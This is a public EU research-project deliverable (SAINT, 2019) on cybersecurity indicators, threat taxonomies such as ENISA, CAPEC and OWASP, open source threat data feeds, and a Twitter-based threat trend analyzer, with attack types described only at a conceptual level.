D2.2 Final Report on Cybersecurity Indicators & Open Source

D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

Work Package WP2: Metrics of Cybersecurity

Document Dissemination Level

P Public x CΟ Confidential, only for members of the Consortium (including the Commission Services)

Document Due Date: 28/02/2019

Document Submission Date: 28/02/2019

This work is performed within the SAINT Project – Systemic Analyser in Network Threats – with the support of the European Commission and the Horizon 2020 Program, under Grant Agreement No 740829

D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

Document Information Deliverable number: D2.2 Deliverable title: Final report on Cybersecurity Indicators & Open Source Intelligence Methodologies Deliverable version: 1.0 Work Package number: WP2 Work Package title: Metrics of Cybersecurity Due Date of delivery: 28/02/2019 Actual date of delivery: Dissemination level: Public Editor(s): Jart Armin (CYBE), Bryn Thompson (CYBE) Contributor(s): Yannis Stamatiou (CTI), Edgardo Montes de Oca (MNTMG) Reviewer(s): Olivia Odell (AS), Dimitris , Kavallieros (KEMEA) Ethical advisor(s): Christina Chalanouli (KEMEA), Project name: Systemic Analyser in Network Threats Project Acronym SAINT Project starting date: 1/5/2017 Project duration: 24 months Rights: SAINT Consortium

Version History Version Date Beneficiary Description 0.1 21/12/2017 CYBE CTI MI First draft 0.2 28/01/2019 CYBE CTI MI 2nd Draft 0.3 15/02/2019 CYBE CTI MI 3rd Draft 0.4 19/02/2019 CYBE 4th Draft 0.5 21/02/2019 CYBE 5th draft for review. 0.6 25/02/2019 CYBE/AS/KEMEA Final draft 1.0 27/02/2019 CYBE Final 1.1 04/03/2019 CYBE Add missing text on malware & Figure #

Table of Contents

1 Introduction ...... 8 2 Cyber Security Taxonomies and Ontology...... 10 2.1 OAT ontology ...... 12 2.2 OWASP Top 10 – web application risks ...... 16 3 SAINT Selection of Cybersecurity Indicators – Phase 1 – (M1 to M6) ...... 18 3.1 ENISA’s Top 15 ...... 18 4 Final Open Source Cybersecurity Indicator Data Sets with WP2 and WP5 Phase 2 – (M3 – M9) ...... 20 5 Indicators - Econometrics ...... 28 5.1 Online population experienced cybercrime (EU) ...... 28 5.2 Time spent / lost per victim of cybercrime ...... 29 5.3 Cost of cybercrime (EU) ...... 29 5.4 Cost of a data breach ...... 30 5.5 Cost to individuals of cybersecurity measures ...... 30 5.6 Cost to enterprises of cybersecurity measures ...... 31 5.7 Cost to governments of cybersecurity measures ...... 32 5.8 Number of individuals working in cybersecurity (2018 EU) ...... 32 5.9 Estimates for cybersecurity personnel needed (by 2020 EU) ...... 33 6 Indicators - Cybercrime Activity ...... 34 6.1 Malware ...... 34 6.1.1 Trojans ...... 36 6.1.2 Viruses (computer) ...... 36 6.1.3 Worms ...... 36 6.2 Web based attacks ...... 36 6.2.1 RFI (remote file inclusion), ...... 36 6.2.2 LFI (local file inclusion),...... 37 6.2.3 XSA (cross server attack), ...... 37 6.2.4 RCE (remote code execution) ...... 37 6.3 Web application attacks ...... 37 6.4 Denial of Service (DoS, DDoS, DrDoS) ...... 38 6.5 Botnets ...... 41 6.6 Phishing ...... 42 6.7 Ransomware ...... 43 6.8 Exploit kits ...... 44 6.8.1 Crimeware ...... 46 6.8.2 Cybercrime as a service ...... 46 6.9 APT (Advanced Persistent Threats) ...... 46

6.10 Data breaches ...... 48 6.11 Cyber attacks ...... 49 6.12 Identity theft ...... 50 6.13 Cyber espionage ...... 50 6.13.1 RATs (Remote Access Trojan) ...... 51 6.13.2 Cyberterrorism ...... 52 6.13.3 Cyberwarfare ...... 52 6.14 Intrusion (computer) ...... 52 6.14.1 Spyware ...... 53 6.14.2 Malvertising ...... 53 6.14.3 Clickjacking ...... 53 6.14.4 Grayware ...... 53 6.14.5 Backdoors ...... 54 6.14.6 Adware ...... 54 6.15 Cryptovirology ...... 54 6.16 Malicious software (badware) ...... 55 6.16.1 Rootkits ...... 56 6.16.2 Bootkits ...... 56 6.16.3 Keyloggers...... 57 6.16.4 Software used for illegal purposes ...... 57 6.17 DNS tunnelling ...... 57 6.18 Domain abuse ...... 58 7 Indicators - Emerging Threats (Examples) ...... 60 7.1 Cryptojacking ...... 60 7.2 Stegomalware (Stegware) ...... 61 7.3 Fileless malware attacks ...... 62 7.4 Automated threats ...... 62 7.5 OAT ontology ...... 63 7.6 Bad bots ...... 64 8 Indicators - Abusive content ...... 65 8.1 Spam (deceptive communications) ...... 67 8.2 Harmful speech ...... 68 8.3 Child/Sexual/Violence/... (child sexual abuse) ...... 68 8.4 Cyberbullying ...... 69 8.5 Fake news (deceptive content) ...... 70 9 Blacklists, Blocklists and Whitelists - Open Source Methodologies ...... 72 10 Indicators - Insecurity ...... 74 10.1 DNS - Misconfigured open resolvers (DDos & DrDos) ...... 74 Copyright SAINT Consortium. All rights reserved. 4 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

10.2 BGP – Hijacking, outages, leaks ...... 75 10.3 Insider threat (malicious and accidental) ...... 76 10.4 Physical manipulation / damage / theft / loss ...... 77 10.5 Information leakage ...... 79 10.6 Vulnerabilities ...... 79 10.7 False positives ...... 80 11 IOCs Indicators of Compromise ...... 81 11.1 Insider threat ...... 81 11.2 Unusual outbound network traffic (egress) ...... 82 11.3 Anomalies in privileged user account activity ...... 82 11.4 Geographical irregularities ...... 83 11.5 Log-in red flags ...... 83 11.6 Increases in database read volume ...... 83 11.7 HTML response sizes ...... 83 11.8 Large numbers of requests for the same file ...... 84 11.9 Mismatched port-application traffic ...... 84 11.10 Suspicious registry or system file changes ...... 85 11.11 Unusual DNS requests ...... 85 11.12 Unexpected patching of systems ...... 86 11.13 Mobile device profile changes ...... 86 11.14 Bundles of data in the wrong place ...... 86 11.15 Web traffic with unhuman behaviour ...... 86 11.16 Signs of DDoS activity ...... 87 12 Indicators - Security ...... 88 12.1 Antivirus ...... 88 12.2 Security Information and Event Management (SIEM)...... 88 12.3 Managed Security Services (MSS) ...... 90 12.4 Security Operations Centre (SOC) ...... 91 12.5 The Cyber Kill Chain ...... 92 12.6 Authentication ...... 93 12.6.1 Multi-factor authentication ...... 94 12.6.2 Authorization ...... 94 12.7 Digital epidemiology (evidence-based practice) ...... 94 12.8 Data-centric security ...... 96 12.9 Data encryption ...... 96 12.10 Firewall ...... 97 12.11 GDPR (General Data Protection Regulation) ...... 98 12.12 Intrusion detection system (IDS) ...... 99 Copyright SAINT Consortium. All rights reserved. 5 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

12.12.1 Intrusion prevention system ...... 100 13 Interoperable ICT Solutions – Open Source ...... 101 13.1 OASIS - STIX, TAXII, CYBOX...... 102 13.2 MISP ...... 102 13.3 YARA ...... 103 14 Conclusions and Recommendations...... 104 14.1 Conclusions ...... 104 14.2 Recommendations ...... 105 15 Annex A - Current List of all Open Source RBLs (Blacklists / Blocklists) - Alive – Feb 19 ...... 107 16 Annex B - List of all RBLs (Open Source Blacklists / Blocklists) – Currently Inactive – Feb 2019 ...... 128 17 Annex C Threat Taxonomy Comparisons ...... 157

Table of Figures

Figure 1.1: The SAINT cybersecurity indicators ...... 9 Figure 2.1: Reference & Common Taxonomy – CSIRTs, LEAs, ENISA, and EC3 ...... 11 Figure 2.2:OAT Ontology – Relating to CAPEC Threat taxonomy ...... 14 Figure 2.3:OAT Ontology – Relating to WASC Threat taxonomy ...... 15 Figure 4.1: Screenshot SAINT Global Security Map – globalsecuritymap.com/saint ...... 25 Figure 4.2:Screenshot SAINT Global Security Map- sample country detail (Germany) – globalsecuritymap.com/saint ...... 26 Figure 4.3:Screenshot SAINT Global Security Map- sample country detail (Finland) – globalsecuritymap.com/saint ...... 27 Figure 6.1:Peak sizes of DDoS 2007- 03/2018 - Arbor Networks ...... 39 Figure 6.2: Top 10 phishing email subjects for 4th quarter 2018 ...... 43 Figure 6.3: Lifecycle of Advanced Persistent Threats (APT) ...... 47 Figure 6.4: Most abused GTLDs – Jan 2019 ...... 59 Figure 8.1: Government required content restrictions - Top 10 countries - Facebook, Instagram, Messenger, Oculus and WhatsApp - Jan to Jun 2018...... 66 Figure 8.2: Government required social media accounts (access locked and awaiting formal governmental paperwork to follow the initial request) ...... 66 Figure 8.3: Top 10 countries - Facebook, Instagram, Messenger, Oculus and WhatsApp - Jan to Jun 2018 (government requests for access to social media accounts) ...... 67 Figure 10.1: Location of Memcached protocol servers (Arbor Networks) ...... 75 Figure 10.2: Memcached amplification attacks recorded 30 days (DDoSMon) ...... 75 Figure 12.1: The SAINT Triad of Evidence-Based Practices for Digital Epidemiology ...... 95 Figure 13.1: ENISA CTI Modules ...... 102

Table of Tables

Table 1-1 Layout of the SAINT Indicator Analysis (Taxonomy)...... 9 Table 2-1: OWASP – OAT Ontology ...... 13 Table 2-2: OWASP Top 10 Web Application Attacks ...... 16 Table 3-1: ENISA - Top Threats published 2017/2018 ...... 19 Table 3-2: ENISA – Top Threats published 2018/2019 ...... 19 Table 4-1: SAINT Final open source threat indicators ...... 20

1 Introduction The objective of WP2 is to set out a framework of methodologies for the development of an ongoing and searchable public database of cybersecurity indicators and open source intelligence methodologies. It features experimental economics, along with cost-benefit analysis of cooperative and regulatory approaches. Areas to be explored and developed within WP 2: analysis of the state-of-the-art in active sources of cyber- threat information; comparative analysis of cybercrime victims within a framework of qualitative social science methodologies; and the role of effective industry standards, benchmarking, standards and regulatory approaches as a cost-benefit factor in cyber-crime reduction. This deliverable combines findings from the initial report on the state-of-the-art in active sources of cyber- threat activity including: blacklists, cyber-attack measurements, malware listing, infected websites and phishing activity, with additional updates and analysis researched for the final report. For D2.1, three distinct research phases were outlined: Phase 1 – Selection of Cybersecurity Indicators – (M1 to M6), Phase 2 – Refine Open Source cybersecurity indicator data sets and interaction with WP5 to build data sets (M3 – M9) and Phase 3 – Report on cyber-security indicators, open source intelligence methodologies (M12). ● Phase 1 - What is a cybersecurity indicator? - A cybersecurity indicator is information with which one can identify malicious reconnaissance, method of attack, the incident itself or its impact(s). ● Phase 2 - What is a cyber threat? - An unwanted action, on or against an information system, and/or its data, with a malicious or harmful intention. ● Phase 3 – D2.1 report defines a taxonomy for the identified cybersecurity indicators. The taxonomy was ratified by SAINT as their own standard classification for the remainder of the project. For D2.2, Phases 1 – 3 were developed further with additional innovative research on cybersecurity indicators and an extension of the taxonomy. In D2.1 we set out to define what is a cybersecurity indicator with a definition as outlined above. In terms of D2.2, cybersecurity indicators are defined within the context of important aids to quantifying threats in the cyber-domain and their evolution over time (threats increase/decrease/stagnate). Indicators help make comparisons across different threats (e.g., frequency of botnets increase, malware stagnation over the past two years, etc). Measurement of indicators of compromise (IOCs) and cyber-security related incidents provide a wealth of information and quantifiable metrics for interpretation in a variety of ways whether it is for enterprises, industry or the economy. Indicators are an essential component of threat intelligence processes. There are numerous indicators, therefore, from which to choose and which are relevant to specific needs. For the purposes of the SAINT research, we aimed to simply the selected SAINT indicators into an illustrative form as depicted in Figure 1.1 below. The number of available indicators within each sub-set is also included in the diagram.

Figure 1.1: The SAINT cybersecurity indicators

Each indicator is explained individually within the SAINT taxonomy and, most importantly, examples given of relevant metrics, where these are available. The chosen format of the SAINT taxonomy is presented using the template as shown in Table 1-1.

Table 1-1 Layout of the SAINT Indicator Analysis (Taxonomy)

Nomenclature Examples Usage Metrics

A SAINT system of names or Where possible, Where possible, Where possible, publicly terms, as those used in open source examples of the reported (open source) cybersecurity to accurately examples of the publicly available recent examples of the define the indicator. indicator are given. recently reported metrics (threat statistics N.B. that part of the problem usage of the indicator / quantification) for an within existing cybersecurity are given. indicator are given. With metrics and econometric added econometric analysis is, within many analysis. publications, is often ill defined, uncommon and self- devised nomenclature.

2 Cyber Security Taxonomies and Ontology Cyber security taxonomies have developed out of the need to classify, organise and understand the scientific concepts in a relatively new field of technology. In broad terms, classification is carried out by the following means:  Taxonomy is the practice and science of classification of things or concepts, including the principles that underlie such classification.  Ontology a set of concepts and categories in a subject area or domain that shows their properties and the relations between them. There is a wealth of valuable previous research on cyber security taxonomies although this has not been translated in the same way and relevance to metrics. The aim of the SAINT taxonomy is to bring these two areas together. Note: The nomenclatures utilised below within the SAINT cybersecurity indicators draw upon the taxonomies from ENISA1, CyberROAD (a research project funded by the European Commission under the Seventh Framework Programme2), Capec3 (Common Attack Pattern Enumeration and Classification) by Mitre, and WASC (Web Application Security Consortium)4 generally accepted commonly usage. The following Figure 2-1 shows the taxonomy resulted from collaboration initiatives such as the annual ENISA/EC3 Workshop which involved CSIRTs, LEAs, ENISA, and EC3.5

1 Threat Taxonomy ENISA, latest version Updated in September 2016 https://www.enisa.europa.eu/topics/threat-risk- management/threats-and-trends/enisa-threat-landscape/threat-taxonomy/view 2 CyberROAD - https://www.cyberroad-project.eu/en/ 3 CAPEC – MITRE - Common Attack Pattern Enumeration and Classification https://capec.mitre.org/data/index.html 4 WASC - Web Application Security Consortium - http://projects.webappsec.org/w/page/13246978/Threat%20Classification 5 CSIRTs, LEAs, ENISA, and EC3 Taxonomy – Jan 2018 - https://www.enisa.europa.eu/publications/reference-incident- classification-taxonomy Copyright SAINT Consortium. All rights reserved. 10 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

Figure 2.1: Reference & Common Taxonomy – CSIRTs, LEAs, ENISA, and EC3

The Common Attack Pattern Enumeration and Classification (CAPEC) effort provides a publicly available catalogue of taxonomies for common attack patterns that helps users understand how adversaries exploit weaknesses in applications and other cyber-enabled capabilities. "Attack Patterns" are descriptions of the common attributes and approaches employed by adversaries to exploit known weaknesses in cyber-enabled capabilities. Attack patterns define the challenges that an adversary may face and how they go about solving it. They derive from the concept of design patterns applied in a destructive rather than constructive context and are generated from in-depth analysis of specific real- world exploit examples. Each attack pattern captures knowledge about how specific parts of an attack are designed and executed, and gives guidance on ways to mitigate the attack's effectiveness. Attack patterns help those developing applications, or administrating cyber-enabled capabilities to better understand the specific elements of an attack and how to stop them from succeeding.

Understanding how the adversary operates is essential to effective cyber security. CAPEC™ helps by providing a comprehensive dictionary of known patterns of attack employed by adversaries to exploit known weaknesses in cyber-enabled capabilities. It can be used by analysts, developers, testers, and educators to advance community understanding and enhance defences. MITRE describes the Benefits, as Attack patterns captured in such a formalized way can bring considerable value to the development and maintenance of cyber-enabled capabilities, including:

• Training – Educate software developers, testers, buyers, and managers. • Requirements – Define potential threats. • Design – Provide context for architectural risk analysis. • Implementation – Prioritize review activities. • Verification – Guide appropriate penetration testing. • Release – Understand trends and attacks to monitor. • Response – Leverage lessons learned into preventative guidance. Threat Taxonomy Comparisons are shown in ANNEX D. 2.1 OAT ontology OWASP produced the OAT (OWASP Automated Threats) ontology. To provide a common language for developers, architects, operators, business owners, security engineers, purchasers and suppliers/ vendors, to facilitate clear, common communications, and threat exchange for automated threats to web applications 6.

6 OWASP – OAT Ontology - OWASP Automated Threat Handbook Web Applications https://www.owasp.org/images/3/33/Automated-threat-handbook.pdf Copyright SAINT Consortium. All rights reserved. 12 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

Table 2-1: OWASP – OAT Ontology

The two figures below show the common relationship between the OAT Ontology with CAPEC and WASC

Figure 2.2:OAT Ontology – Relating to CAPEC Threat taxonomy

Figure 2.3:OAT Ontology – Relating to WASC Threat taxonomy

2.2 OWASP Top 10 – web application risks OWASP (Open Web Application Security Project) Top 10 - 2017, The Ten Most Critical Web Application Security Risks7 is displayed In Table 2-2 below:

Table 2-2: OWASP Top 10 Web Application Attacks

The OWASP Top 10 - 2017 is based primarily on 40+ data submissions from firms that specialize in application security and an industry survey that was completed by over 500 individuals. This data spans vulnerabilities gathered from hundreds of organizations and over 100,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability and impact. Website Injection Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. Web Broken Authentication & Session Management Application functions related to authentication and session management are often implemented incorrectly This allows attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws that allow temporarily or permanently taking control of a users’ identity. XSS (cross site scripting) XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. Broken Access Control Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts,

7 OWASP Top 10 2017 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project OWASP Top 10 2017 - https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf Copyright SAINT Consortium. All rights reserved. 16 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies view sensitive files, modify other users’ data, change access rights, etc. Security Misconfiguration Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched and upgraded in a timely fashion. Sensitive Data Exposure Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser. Insufficient Attack Protection Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring. Website Components with Known Vulnerabilities Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defences and enable various attacks and impacts. Unprotected APIs (application programming interface) Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI (Uniform Resource Identifier) handler, internal file shares, internal port scanning, remote code execution and denial of service attacks.

3 SAINT Selection of Cybersecurity Indicators – Phase 1 – (M1 to M6) 3.1 ENISA’s Top 15 The role of European Union Agency for Network and Information Security (ENISA) has expanded and developed since it began in 2004 8. ENISA provides recommendations on cybersecurity, supports policy development and its implementation, and collaborates with operational teams throughout Europe. The objective of ENISA is to improve network and information security in the European Union. ENISA’s role has continued to expand in recent years. A political agreement to establish a permanent mandate in the Cybersecurity Act was reached on 10 December 2018 by the European Parliament, the Council of the European Union, and the European Commission. ENISA is now known as ‘the EU Agency for Cybersecurity’9. The agreement reinforces the mandate of the agency, to better support the EU Member States in dealing with cybersecurity threats and attacks. The main highlights of the Cybersecurity Act:

• ENISA will receive a permanent mandate with more human and financial resources; • ENISA will increase its support to EU Member States, in order to improve capabilities and expertise, notably in the areas of cyber crisis coordination and the prevention of and response to cyber- incidents; • Within the Cybersecurity Certification Framework, ENISA will have market-related tasks, notably by preparing European cybersecurity certification schemes with the expert assistance and close cooperation of national certification authorities and industry; • ENISA will strengthen its support to Member States and the EU institutions in the development, implementation and review of general cybersecurity policy. Annually, since 2012, ENISA has published the Top 15 Threats and the widely recognised Threat Taxonomy (ETT - 2016) 1011 that organizations and individuals have been exposed to - see Table 3.1. Therefore, for the selection of core cybersecurity indicators, SAINT has focused on ENISA’s Top 15 threats. Other indicators are introduced during Phase 2 below. Table 3.1 also indicates the current trends in the occurrence of these threats in 2016 and 2017.

8 https://www.enisa.europa.eu/ 9 https://www.enisa.europa.eu/news/enisa-news/eu-leaders-agree-on-ground-breaking-regulation-for-cybersecurity- agency-enisa 10 ENISA Threat landscape https://www.enisa.europa.eu/topics/threat-risk-management/threats-and-trends/enisa- threat-landscape 11 Evaluation of Comprehensive Taxonomies for Information Technology Threats - SANS Mar 2018 - https://www.sans.org/reading-room/whitepapers/threatintelligence/evaluation-comprehensive-taxonomies- information-technology-threats-38360 Copyright SAINT Consortium. All rights reserved. 18 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

Table 3-1: ENISA - Top Threats published 2017/2018

Table 3-2: ENISA – Top Threats published 2018/2019

4 Final Open Source Cybersecurity Indicator Data Sets with WP2 and WP5 Phase 2 – (M3 – M9) For Phase 2 of D2.1 – Refine Open Source cybersecurity indicator data sets and interaction between WP2 and WP5 to build data sets (M3 – M9), the following, Table 4-1, lists by order of importance the final threat indicators. Table 4-1: SAINT Final open source threat indicators

Note: Items 1-9 on Table 4-1 will be within the open source data feed in the short term to SAINT’s GSM (Global Security Map) and described below in 4.1 to 4.13. Items 10-19 in Table 4-1 are ultimately desirable for later (beyond the project lifetime) within the open source data feed in the short term to SAINT’s GSM (Global Security Map). The following Sections 4.1 to 4.13 summarize the progress, current state and briefing information about each threat indicator examined, analysed and implemented by SAINT. It should be noted that the data of all these indicators are open source. As of the publication of this deliverable, 12 indicators (as detailed the list 4.1 to 4.12 below) have been outputted to a SAINT version of the Global Security Map tool provided by CYBE for SAINT (see Figure 4-1 below). These indicators will be used to display frequent updates of each indicator on a global map view and will also take into account the results of the surveys in D2.3. In the publication of D2.2, the SAINT indicators are documented and the website will be made live before the end of the project. 4.1 Threat Indicator 1 - • Type: Malware (domains) • About: ENISA Top 15 Threats • Information: This is a Malware indicator reporting a variety of malicious web pages across the internet. This indicator does not seem to focus on a specific category of intrusive or harmful software. On the contrary, it covers a wide spectrum of cyber threats including Trojan, phishing, malware or even suspicious software. The interesting part about this indicator is that it constitutes a mirror for other opensource malware lists.

Threat Indicator 2 – Blocklist-all • Type: Web Based Attacks • About: ENISA Top 15 Threats • Information: The indicator represents a blocked IPs list, meaning a list with all the IPs from which cyberattacks are launched. 4.3 Threat Indicator 3 – Dshield-block

• Type: Web Based Attacks • About: ENISA Top 15 Threats • Information: This indicator is a list that summarizes the top 20 attacking class C (/24) subnets over the last three days. The number of 'attacks' indicates the number of targets reporting scans from this subnet. 4.4 Threat Indicator 4 – Phishing Attacks • Type: Phishing • About: ENISA Top 15 Threats• Feed: https://www.phishtank.com/ • Information: The term phishing describes all malicious software disguised as trustworthy during an electronic communication, luring that way users as bait in an attempt to convince them of sharing sensitive personal information such as usernames, passwords and credit card details. This indicator provides information about attacks that fall into phishing category. As an indicator gives a large amount of phishing related events meaning that lists all malicious IPs which launch deceiving software with intent to collect personal and sensitive information. 4.5 Threat Indicator 5 – DDoS • Type: DDoS • About: ENISA Top 15 Threats • Information: DDoS refers to denial of service and suggests a cyber-attack where the perpetrator tries to set a machine, service or network unavailable. To manage this usually floods the targeted machine with a very big number of requests with a fast rate till the machine is overloaded, unable to provide any service to clients. In this spirit, Exploit Data Base is a CVE (Common Vulnerabilities and Exposure) compatible database maintained by offensive security, that provides users with usually sensitive information made publicly available to the Internet. 4.6 Threat Indicator 6 – Botnets C&Cs • Type: Botnets • About: ENISA Top 15 Threats • Information: This indicator belongs to botnets category. This term pictures a set of usually interconnected devices across the internet that run automated scripts and aim to fulfil a task distributed, e.g. a DDoS attack. Usually a such distributed system of bots is controlled by the owner using command and control (C&C) system. The term botnet derives from the word bot and net as short terms of robot and network respectively. Bot best describes the devices that were compromised meaning the devices which were penetrated by malicious software, whose security was breached, and control was taken over.

4.7 Threat Indicator 7 – Botnets IPs • Type: Botnets • About: ENISA Top 15 Threats • Information: This provides users with useful information about bot related activities. It helps prevent automated web scripts, known as "bots", from registering on forums, polluting databases, spreading spam, and abusing forms on web sites. That is possible by tracking the names, IPs, and email addresses that bots use and logging them as unique signatures for future reference. 4.8 Threat Indicator 8 – Ransomware blocklist • Type: Ransomware • About: ENISA Top 15 Threats (2nd Priority) • Information: Ransomware is a type of malicious software that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. In some cases, the ransomware might not be difficult to be reversed by a knowledgeable user while in other circumstances the malware is more advanced and uses techniques called crypto-viral extortion in which victims files are encrypted that made inaccessible. This Ransomware Tracker indicator offers various types of blocklists that allow to block Ransomware Botnet C&C traffic. The available Ransomware blocklists are documented and updated in 5 minutes intervals. 4.9 Market Indicator 9 – Bug Bounties • Type: Bug-Bounties • About: ENISA Top 15 Cybersecurity Markets • Information: This is the one of the best hacker-powered security platforms. Its goal is to help organizations find and fix critical vulnerabilities before they can be criminally exploited. Big companies all over the world trust this source to test and secure the applications they depend on to run their business. As a bounty platform publishes pages that contain prices and hacker activities for solving bugs. This is very valuable information for monitoring the price fluctuation on bug bounties for different platforms and software applications. 4.10 Threat Indicator 10 – SPAM • Type: Spam • About: ENISA Top 15 Threats (2nd Priority) • Information: Spam is a case of electronic messaging systems that send unsolicited messages called spams and especially relate to advertising. This indicator is also under the clean-mx domain so the issues remain the same with the phishing and malware cases. 4.11 Threat Indicator 11 – Ransomware blocklist • Type: Ransomware • About: ENISA Top 15 Threats (2nd Priority) • Information: Ransomware is a type of malicious software that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. In some cases, the ransomware might not be difficult to be reversed by a knowledgeable user while in other circumstances the malware is more advanced and uses techniques called crypto-viral extortion in which victims files are encrypted that made inaccessible. This Ransomware Tracker indicator offers various types of blocklists that allow to

block Ransomware Botnet C&C traffic. The available Ransomware blocklists are documented and updated in 5 minutes intervals. 4.12 Cybersecurity Social Network Analyzer (CSNA) Twitter is one of the most well-known online social networks that has gained extreme popularity during the recent years. The service it provides is referred to as microblogging, which is a type of blogging where the posted messages are limited in size by the system. Twitter also contributed to popularizing the use of the term hashtag, to group conversations and allow users to follow a particular topic easily. Given the variety of hashtags and their targeted grouping properties, as well as its real-time nature, Twitter is considered a valuable information source for the real-time evolution of discussions about current issues of global interest as well as trends in various domains (in our case, cybersecurity). Thus, Twitter is the main target for Social Network Analysis, as well as a toolset of WP5. The Twitter Cybersecurity Social Network Analyzer (CSNA) is the CTI’s tool that collects to the database huge number of tweets that are related to the cybercrime (threats) and the cybersecurity markets. It is divided into two parts, which consist of the Twitter Crawler and the Social Network Analyzer itself. These two functionalities yield flexibility so as CSNA to be easy to interface with other crawler modules for other targeted social networks. Thus, the Twitter Crawler is not “hardwired” into the CSNA to allow for this flexibility. The Twitter CSNA uses the Twitter Streaming API, where “streaming” means that once a connection is opened, it is maintained open and active during the duration of the connection, much like circuit switching network and telephony connections. By keeping the HTTP connection open, all the tweets that match the searching criteria can be retrieved in real time without the need of re-establishing the connection or, possibly, violating the connection time limits. Thus, the Twitter Streaming API is one of the most effective and efficient ways of retrieving massive amounts of the queried data without the danger of exceeding the rate limits and losing the connection during data downloads. The data flow process in the SAINT Cybersecurity Social Network Analyzer can be summarized in the following steps: 1. Setting up a search query: Starting with this step, a query containing search keywords, i.e. hashtags, is created and inserted into the crawler script as a parameter so that a search process is initiated for tweets that include the hashtags. The keywords (hashtags) and the related posted tweets, that SAINT’s CSNA searches for, are divided into two categories: • Markets corresponding to Cybersecurity: Bug Bounty programs, Security contests, and Vulnerability Markets.

• Threats: Malware, Ransomware, Botnets, and Trojan. 2. User Authentication (OAuth): At this point, an Open Authorization request is created by the App in the Twitter account where we retrieved the API keys, the API secrets, the Access Tokens and the Access Token Secrets as dictated by the OAuth policies and protocols. In that way, CTI’s Twitter Crawler can be granted access to the Twitter platform and, especially, to the Twitter Streaming API which will be deployed for searching and gathering the tweets that are created in real-time by Twitter users. 3. Data collection (Tweets): The Twitter Crawler searches and downloads in real time the raw tweets that are related to the search hashtags queries mentioned before, into CTI’s server (in the form of large JSON files) and the database (implemented in the NoSQL MongoDB DBMS). Respecting the Twitter rate limits and privacy/security policies, the Crawler accesses only publicly available information and not private accounts

Copyright SAINT Consortium. All rights reserved. 23 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies or information. 4. Data cleaning and pre-processing: Various data pre-processing techniques and methods take place during this step looking for invalid data transformations and imposing to the desired, machine-readable, format for the subsequent analysis by the Social Network Analyzer and its constituent modules. 5. Modelling and analysis: Natural Language Processing, Regular Expression Analysis, and other Data Analysis techniques (e.g. Statistical models), regarding the tweets that are collected to the CTI server, take place during this step of the analysis, transforming the input into suitably formatted representations (hashtags and terms trends line charts and bar plots). 6. Result presentation (Visualization): Finally, data visualization methods of the retrieved data are used during this step and the following outcomes are created: • interactive bar plots (histograms): most used hashtags, user mentions and word terms both in threats and markets section. As a future work, a function of selecting and depicting different time intervals (e.g. last month, last week) will be integrated. • interactive time series line charts: time series analysis for monitoring emerging topics over time. Further implementation will take place till the end of the project, as more threats will be integrated soon in the time series analysis. The preceding charts are suitable for quick and easy representation of data by data analysts. With every chart, a CSV file, which includes valuable information proper for Data Analysis in various applications, is available for download too. It is necessary to process data in CSV format because it is:

• Human-readable and easy to edit manually, • Simple to implement and parse, • Processed by almost all existing applications, • Provides a straightforward information schema, • Faster to handle, • Smaller in size than similar data file formats, • Considered to be a standard format, • Compact, • Manageable by Microsoft Excel, Magento or similar programs, • Suitable and widely used in Statistical Analysis. Thus, files that are exported from the CSNA’s data analysis tool and are related to corresponding datasets that Twitter sub-crawlers create, are exported in CSV format too. The SAINT Twitter CSNA is a tool for monitoring the trending topics in some of ENISA Top 15 threats, as well as the everyday fluctuation of Bug Bounty programs and markets related to cybersecurity and using human intelligence for mining and correlating threats and their impacts to the markets.

The 12 indicators selected for integration into the SAINT version of the Global Security Map tool provided by CYBE (see Figure 4-1 below) are outlined in the above list (points 4.1 to 4.12). These indicators will contribute to an enhanced global view of cyber security issues. A snapshot of a global view is provided in Figure 4-1 below.

Figure 4.1: Screenshot SAINT Global Security Map – globalsecuritymap.com/saint

